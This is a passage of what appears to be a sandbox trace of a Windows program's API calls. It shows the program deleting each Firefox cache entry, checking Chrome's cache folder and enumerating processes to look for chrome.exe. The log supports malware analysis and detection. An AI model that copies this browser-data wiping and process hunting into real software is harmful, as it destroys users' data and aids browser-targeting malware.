"c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\59bb52b352de6d0ed5d0376b33855d43ca80b3f7")) returned 1 [0253.797] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.797] lstrlenW (lpString="59D05F1B38666C8EF68BDEE20A28647F754464F6") returned 40 [0253.797] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="59D05F1B38666C8EF68BDEE20A28647F754464F6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\59D05F1B38666C8EF68BDEE20A28647F754464F6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\59D05F1B38666C8EF68BDEE20A28647F754464F6" [0253.797] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\59D05F1B38666C8EF68BDEE20A28647F754464F6" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\59d05f1b38666c8ef68bdee20a28647f754464f6")) returned 1 [0253.798] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.798] lstrlenW (lpString="5A39FCB4CCAE4A6C76307026D7C882B4AE85B1F9") returned 40 [0253.798] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5A39FCB4CCAE4A6C76307026D7C882B4AE85B1F9" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5A39FCB4CCAE4A6C76307026D7C882B4AE85B1F9") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5A39FCB4CCAE4A6C76307026D7C882B4AE85B1F9" [0253.798] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5A39FCB4CCAE4A6C76307026D7C882B4AE85B1F9" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5a39fcb4ccae4a6c76307026d7c882b4ae85b1f9")) returned 1 [0253.799] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.799] lstrlenW (lpString="5A6EEC1674DA4669A4FF612E7924A91FBF501426") returned 40 [0253.799] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5A6EEC1674DA4669A4FF612E7924A91FBF501426" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5A6EEC1674DA4669A4FF612E7924A91FBF501426") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5A6EEC1674DA4669A4FF612E7924A91FBF501426" [0253.799] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5A6EEC1674DA4669A4FF612E7924A91FBF501426" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5a6eec1674da4669a4ff612e7924a91fbf501426")) returned 1 [0253.800] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.800] lstrlenW (lpString="5AF1F43361120818C2E543605F5DF938574B1EDC") returned 40 [0253.800] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5AF1F43361120818C2E543605F5DF938574B1EDC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5AF1F43361120818C2E543605F5DF938574B1EDC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5AF1F43361120818C2E543605F5DF938574B1EDC" [0253.800] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5AF1F43361120818C2E543605F5DF938574B1EDC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5af1f43361120818c2e543605f5df938574b1edc")) returned 1 [0253.801] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.801] lstrlenW (lpString="5B1B55B57E2440A52DE3FED7E02C83E04A78B0FD") returned 40 [0253.801] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5B1B55B57E2440A52DE3FED7E02C83E04A78B0FD" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5B1B55B57E2440A52DE3FED7E02C83E04A78B0FD") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5B1B55B57E2440A52DE3FED7E02C83E04A78B0FD" [0253.801] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5B1B55B57E2440A52DE3FED7E02C83E04A78B0FD" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5b1b55b57e2440a52de3fed7e02c83e04a78b0fd")) returned 1 [0253.803] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5B928BD544BA66929A709C6AEC9D5968DCB905A1" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5B928BD544BA66929A709C6AEC9D5968DCB905A1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5B928BD544BA66929A709C6AEC9D5968DCB905A1" [0253.803] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5B928BD544BA66929A709C6AEC9D5968DCB905A1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5b928bd544ba66929a709c6aec9d5968dcb905a1")) returned 1 [0253.804] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5BDDE6C7804D11CE399AF314C3D33E47FBAE7C88" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5BDDE6C7804D11CE399AF314C3D33E47FBAE7C88") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5BDDE6C7804D11CE399AF314C3D33E47FBAE7C88" [0253.804] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5BDDE6C7804D11CE399AF314C3D33E47FBAE7C88" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5bdde6c7804d11ce399af314c3d33e47fbae7c88")) returned 1 [0253.805] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5C30F12D68A505E4AE0A6A3D896A1EC9C549AE96" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5C30F12D68A505E4AE0A6A3D896A1EC9C549AE96") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5C30F12D68A505E4AE0A6A3D896A1EC9C549AE96" [0253.805] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5C30F12D68A505E4AE0A6A3D896A1EC9C549AE96" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5c30f12d68a505e4ae0a6a3d896a1ec9c549ae96")) returned 1 [0253.805] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5D3D330EFBD2B9CD6EB45919D9403F605414EFA5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5D3D330EFBD2B9CD6EB45919D9403F605414EFA5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5D3D330EFBD2B9CD6EB45919D9403F605414EFA5" [0253.805] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5D3D330EFBD2B9CD6EB45919D9403F605414EFA5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\5d3d330efbd2b9cd6eb45919d9403f605414efa5")) returned 1 [0254.191] lstrcpyW (in: lpString1=0x79cdac0, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" [0254.191] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\", lpString2="8i341t8m.default" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0254.191] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpString2="\\Cache\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\Cache\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\Cache\\" [0254.191] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\Cache\\" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache")) returned 0xffffffff [0254.191] FindNextFileW (in: hFindFile=0x44304d0, lpFindFileData=0x44dfcc0 | out: lpFindFileData=0x44dfcc0) returned 0 [0254.191] FindClose (in: hFindFile=0x44304d0 | out: hFindFile=0x44304d0) returned 1 [0254.191] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x7aaeab0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x0 [0254.191] lstrcpyW (in: lpString1=0x79cd8a0, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0254.191] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local", lpString2="\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0254.191] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache")) returned 0x10 [0254.213] lstrlenA (lpString="chrome.exe") returned 10 [0254.213] mbstowcs (in: _Dest=0x7aae670, _Source="chrome.exe", _MaxCount=0xb | out: _Dest="chrome.exe") returned 0xa [0254.213] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8e4 [0254.217] Process32FirstW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.218] lstrcmpiW (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0254.218] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x66, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.219] lstrcmpiW (lpString1="System", lpString2="chrome.exe") returned 1 [0254.219] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.221] lstrcmpiW (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0254.221] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.222] lstrcmpiW (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0254.222] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.224] lstrcmpiW (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0254.224] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.225] lstrcmpiW (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0254.225] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.227] lstrcmpiW (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0254.227] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.228] lstrcmpiW (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0254.228] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1b8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.230] lstrcmpiW (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0254.230] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.231] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.231] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.233] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.233] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1b0, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.234] lstrcmpiW (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0254.234] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.236] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.236] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.237] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.237] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.238] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.238] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.240] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.240] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.241] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.241] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.242] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.242] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.243] lstrcmpiW (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0254.243] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.245] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.245] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.246] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.246] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0254.248] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="chrome.exe") returned 1 [0254.248] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.251] lstrcmpiW (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.251] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0254.252] lstrcmpiW (lpString1="sihost.exe", lpString2="chrome.exe") returned 1 [0254.252] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0254.254] lstrcmpiW (lpString1="taskhostw.exe", lpString2="chrome.exe") returned 1 [0254.254] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.255] lstrcmpiW (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.255] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0254.256] lstrcmpiW (lpString1="RuntimeBroker.exe", lpString2="chrome.exe") returned 1 [0254.256] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x9b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0254.258] lstrcmpiW (lpString1="ShellExperienceHost.exe", lpString2="chrome.exe") returned 1 [0254.258] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0254.260] lstrcmpiW (lpString1="SearchUI.exe", lpString2="chrome.exe") returned 1 [0254.260] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.261] lstrcmpiW (lpString1="backgroundTaskHost.exe", lpString2="chrome.exe") returned -1 [0254.261] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0254.263] lstrcmpiW (lpString1="cmd.exe", lpString2="chrome.exe") returned 1 [0254.263] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xad8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbf0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0254.264] lstrcmpiW (lpString1="conhost.exe", lpString2="chrome.exe") returned 1 [0254.264] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="makecab.exe")) returned 1 [0254.265] lstrcmpiW (lpString1="makecab.exe", lpString2="chrome.exe") returned 1 [0254.265] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, 